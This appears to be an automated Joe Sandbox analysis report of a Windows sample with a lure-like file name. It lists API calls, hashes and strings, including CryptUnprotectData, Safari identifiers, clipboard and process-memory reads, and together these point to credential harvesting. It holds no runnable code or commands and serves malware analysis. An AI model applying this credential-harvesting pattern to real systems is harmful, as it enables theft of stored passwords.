                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 613200358-0
                                                                                                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                          APIs
                                                                                                                          • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnumNamesResource
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3334572018-0
                                                                                                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                          APIs
                                                                                                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseFind
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1863332320-0
                                                                                                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                          • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004095FC
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                            • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                            • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3655998216-0
                                                                                                                          • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                          • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00445426
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1828521557-0
                                                                                                                          • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                          • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@FilePointermemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 609303285-0
                                                                                                                          APIs
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmp
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2081463915-0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2136311172-0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@??3@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1936579350-0
                                                                                                                          APIs
                                                                                                                          Similarity
                                                                                                                          • API ID: free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1294909896-0
                                                                                                                          APIs
                                                                                                                          Similarity
                                                                                                                          • API ID: free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1294909896-0
                                                                                                                          APIs
                                                                                                                          • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                          • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                          • GetLastError.KERNEL32 ref: 00409974
                                                                                                                          • CloseClipboard.USER32 ref: 0040997D
                                                                                                                          Similarity
                                                                                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3604893535-0
                                                                                                                          APIs
                                                                                                                          • EmptyClipboard.USER32 ref: 00409882
                                                                                                                          • wcslen.MSVCRT ref: 0040988F
                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                          • CloseClipboard.USER32 ref: 004098D7
                                                                                                                          Similarity
                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1213725291-0
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                          • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                          • free.MSVCRT ref: 00418370
                                                                                                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                          • String ID: OsError 0x%x (%u)
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                          • String ID:
                                                                                                                          APIs
                                                                                                                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                          Similarity
                                                                                                                          • API ID: NtdllProc_Window
                                                                                                                          • String ID:
                                                                                                                          APIs
                                                                                                                          • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                          • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                          • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                          • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                          • memset.MSVCRT ref: 0040265F
                                                                                                                          • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                          • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                          • String ID: :stringdata$ftp://$http://$https://
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                          • GetDC.USER32 ref: 004140E3
                                                                                                                          • wcslen.MSVCRT ref: 00414123
                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                          • _snwprintf.MSVCRT ref: 00414244
                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                                          APIs
                                                                                                                          • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                          • memset.MSVCRT ref: 00413292
                                                                                                                          • memset.MSVCRT ref: 004132B4
                                                                                                                          • memset.MSVCRT ref: 004132CD
                                                                                                                          • memset.MSVCRT ref: 004132E1
                                                                                                                          • memset.MSVCRT ref: 004132FB
                                                                                                                          • memset.MSVCRT ref: 00413310
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                          • memset.MSVCRT ref: 004133C0
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                          • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                          • wcscpy.MSVCRT ref: 0041341F
                                                                                                                          • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                          • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                          Strings
                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                          • {Unknown}, xrefs: 004132A6
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
